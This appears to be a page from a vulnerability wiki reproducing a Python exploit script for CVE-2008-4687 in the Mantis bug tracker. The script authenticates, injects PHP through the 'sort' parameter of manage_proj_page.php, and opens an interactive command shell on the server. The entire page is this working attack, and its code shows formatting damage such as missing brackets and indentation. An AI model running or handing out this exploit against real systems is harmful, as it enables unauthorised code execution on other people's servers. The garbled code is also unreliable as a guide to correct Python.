PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
EXP
# Quick and dirty exploit for CVE-2008-4687.
# Description by NIST:
# manage_proj_page.php in Mantis before 1.1.4 allows remote authenticated users to
# execute arbitrary code via a sort parameter containing PHP sequences, which are p
# rocessed by create_function within the multi_sort function in core/utility_api.php.
# Author: Nelson Murilo
# Date: 2020/02/15
import requests
import hashlib
import base64
import sys
if len(sys.argv) != 5:
print ("Usage: pymantis host path user pass")
exit(-1)
host = sys.argv1
path = sys.argv2
user = sys.argv3
pwd = sys.argv4
urlbase = "http://" + host
# just a little joke
ua = 'Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/3.0.4.2.12 NintendoBrowser/4.3.1.11264.US'
p='PHPSESSID='+str(hashlib.md5('xploit'.encode()).hexdigest())
d = { 'username':user , 'password': pwd }
r = requests.Session()
ret = r.get(urlbase + path + 'login_page.php')
h = {
'Host': host,
'User-Agent': ua,
'Cookie': p,
'Connection': 'close'
}
ret = r.post(urlbase + path + 'login.php', data=d, headers=h)
try:
cookies = p + "; ISSUES_STRING_COOKIE=" + r.cookies'ISSUES_STRING_COOKIE'
print("** Exploit works like a charm!")
except:
print("Ops! Exploit fail - Bye")
quit()
#
# Poor man reverse shell
#
r.headers
{
'Host': host,
'Cookie': cookies,
'Content-type': 'application/json; charset=utf-8',
'Connection': 'close'
}
pow = "\');}error_reporting(0);print(_code_);passthru(base64_decode($_SERVERHTTP_CMD));die;%23"
url = urlbase + path + 'manage_proj_page.php?sort=' + pow
cmd = ""
while True:
cmd = input("www-data# ")
if not cmd:
continue
if cmd.lower() in {'exit'}:
break
h = {
'Host': host,
'User-Agent': ua,
'Cookie': cookies,
'Cmd': base64.b64encode(cmd.encode('utf-8')).decode('utf-8'),
'Connection': 'close'
}
ret = requests.get(url, headers=h)
response = str(ret.content)
for line in response.partition('_code_')2.split("\\n"):
print(line.strip("\'"))
print("Bye")
免费、自由、人人可编辑的漏洞库--pwnwiki.com
